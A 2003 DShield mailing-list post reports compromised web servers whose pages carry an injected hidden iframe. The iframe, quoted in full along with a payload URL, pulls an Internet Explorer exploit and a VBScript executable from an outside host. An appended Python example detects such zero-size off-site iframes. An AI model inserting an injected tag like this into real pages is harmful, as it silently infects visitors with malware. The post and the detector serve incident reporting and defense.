[Dshield] Web Sites compromised

Loren Aman laman at htch.com
Wed Sep 3 20:07:52 GMT 2003


We've run into several web servers in the past week that appear to be 
compromised.  At the bottom of every web page is the following html code:

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp  width=0 height=0 
frameborder=0 marginwidth=0 marginheight=0></iframe>

It seems to take advantage of a flaw in unpatched Internet Explorer 6 
systems causing them to retrieve a vbscript executable with the following URL:

http://ww.beech-info2.com/cgi-bin/inf2.pl

McAfee lists the infection as Coreflood or JS/Cisp which is quite old, but 
if you Google for the html string there are about 6 pages worth of 
compromised web sites. Could this be something being actively exploited?
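
A check for the indicator described in the post above, as an added example that is not part of the original message: it flags iframes that render with zero width or height and load from a host other than the site's own. The function names, the sample page and the hosts in it are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are invisible and load from another host."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.hits = []  # (line number, src) pairs

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # The parser accepts unquoted attribute values, as in the injected tag.
        a = {name: (value or "").strip() for name, value in attrs}
        hidden = any(a.get(d, "").lower().rstrip("px%") == "0"
                     for d in ("width", "height"))
        src = a.get("src", "")
        try:
            host = urlparse(src).hostname  # None for relative URLs
        except ValueError:
            host = "<unparseable>"  # malformed URL: treat as external
        external = host is not None and host != self.site_host
        if hidden and external:
            self.hits.append((self.getpos()[0], src))


def find_hidden_iframes(html, site_host):
    """Return [(line, src)] for zero-size iframes pointing off-site."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.hits


# Constructed sample page: one local hidden frame, one visible external
# frame, and one hidden external frame in the form quoted in the post.
SAMPLE_PAGE = """<html><body>
<p>Welcome</p>
<iframe src="/banner.html" width=0 height=0></iframe>
<iframe src=http://maps.example.org/map.html width=400 height=300></iframe>
<iframe src=http://injected.example/_x/page.asp  width=0 height=0
frameborder=0 marginwidth=0 marginheight=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src in find_hidden_iframes(SAMPLE_PAGE, "www.example.com"):
        print(f"line {line}: hidden external iframe -> {src}")
```

Run over the served pages rather than only the files on disk, since the post describes the tag appearing at the bottom of every page.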



